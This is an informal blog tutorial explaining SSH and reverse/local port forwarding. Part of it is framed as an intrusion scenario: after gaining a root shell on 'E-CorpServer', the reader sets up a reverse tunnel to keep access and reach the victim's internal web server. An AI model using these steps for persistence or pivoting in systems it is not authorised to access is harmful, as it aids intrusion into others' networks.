Today’s Tutorial will teach you how ssh Tunnels work. This is not a Hacking Tutorial ( but you can use the Knowledge you will have for hacking : make socks proxy or stay on a target machine with reverse ssh). SSH Tunnelling will help you to access services behind a Nat or a Firewall.
Well, it’s time to talk about SSH
What is ssh ?
Here what is ssh ( thank to our good friend Wikipedia )
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.The best known example application is for remote login to computer systems by users.
SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH client application with an SSH server. Common applications include remote command-line login and remote command execution, but any network service can be secured with SSH. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2.
SSH help you secure your connection between two host. This is a really good protocol if you want to avoid man in the middle attack !
How to connect to a machine behind NAT / Firewall
Here a little network diagram
The server block ssh connection so you won’t be able to acces your the server from home.
What we will learn is to do a reverse ssh Connection, the server will connect to a public server and then you will be able to ssh to the server
Here are the step to connect to the server who is behind a firewall :
- forward the port 22 of the E-CorpServer to the port 1234 of your server
- Connect to your server from home
- Connect to the E-CorpServer from your server
The E-CorpServer will connect to your server through ssh and do a remote port forwarding
E-CorpServer -> hackerserver:22
then Forward port 22 to hackerserver:1234
Your home machine will connect to hackserver
home -> hackserver:22
hackserver -> localhost:1234
Accessing the internal Web Server of E-Corp
Here the story :
You have succefully get a root shell on the E-CorpServer, you use the reverse ssh to be able to connect from home but you want to acces the web internal web page from your browser
Here what you should do :
- forward the port 8080 of the E-CorpServer to the port 8080 of your server
- forward your local port 80 to the remote port 8080 of your server
And you will be able to browse their internal web server : )
Hope You understand how ssh tunneling work !
About the Nebula Serie
Here a poll for you to decide if I stop the nebula serie or if I do something else
- Stop the Nebula series
- The Series is good ! I want more tutorial
- We want Tutorial on android Malware !
See you for my Next tutorial ! : )